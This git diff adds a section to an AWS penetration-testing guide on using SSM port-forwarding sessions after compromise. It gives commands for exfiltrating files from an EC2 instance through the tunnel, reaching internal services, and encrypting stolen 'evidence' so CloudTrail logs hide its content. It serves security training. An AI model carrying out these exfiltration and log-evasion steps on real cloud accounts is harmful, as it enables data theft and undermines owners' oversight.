diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md index bfd300c700..7583159afe 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md @@ -138,6 +138,54 @@ Note that the SSL connections will fail unless you set the `--insecure-skip-tls- Finally, this technique is not specific to attacking private EKS clusters. You can set arbitrary domains and ports to pivot to any other AWS service or a custom application. +--- + +#### Quick Local ↔️ Remote Port Forward (AWS-StartPortForwardingSession) + +If you only need to forward **one TCP port from the EC2 instance to your local host** you can use the `AWS-StartPortForwardingSession` SSM document (no remote host parameter required): + +```bash +aws ssm start-session --target i-0123456789abcdef0 \ + --document-name AWS-StartPortForwardingSession \ + --parameters "portNumber"="8000","localPortNumber"="8000" \ + --region +``` + +The command establishes a bidirectional tunnel between your workstation (`localPortNumber`) and the selected port (`portNumber`) on the instance **without opening any inbound Security-Group rules**. + +Common use cases: + +* **File exfiltration** + 1. On the instance start a quick HTTP server that points to the directory you want to exfiltrate: + + ```bash + python3 -m http.server 8000 + ``` + + 2. From your workstation fetch the files through the SSM tunnel: + + ```bash + curl http://localhost:8000/loot.txt -o loot.txt + ``` + +* **Accessing internal web applications (e.g. Nessus)** + +```bash +# Forward remote Nessus port 8834 to local 8835 +aws ssm start-session --target i-0123456789abcdef0 \ + --document-name AWS-StartPortForwardingSession \ + --parameters "portNumber"="8834","localPortNumber"="8835" +# Browse to http://localhost:8835 +``` + +Tip: Compress and encrypt evidence before exfiltrating it so that CloudTrail does not log the clear-text content: + +```bash +# On the instance +7z a evidence.7z /path/to/files/* -p'Str0ngPass!' +``` + + ### Share AMI ```bash @@ -474,6 +522,10 @@ if __name__ == "__main__": main() ``` +## References + +- [Pentest Partners – How to transfer files in AWS using SSM](https://www.pentestpartners.com/security-blog/how-to-transfer-files-in-aws-using-ssm/) + {{#include ../../../../banners/hacktricks-training.md}}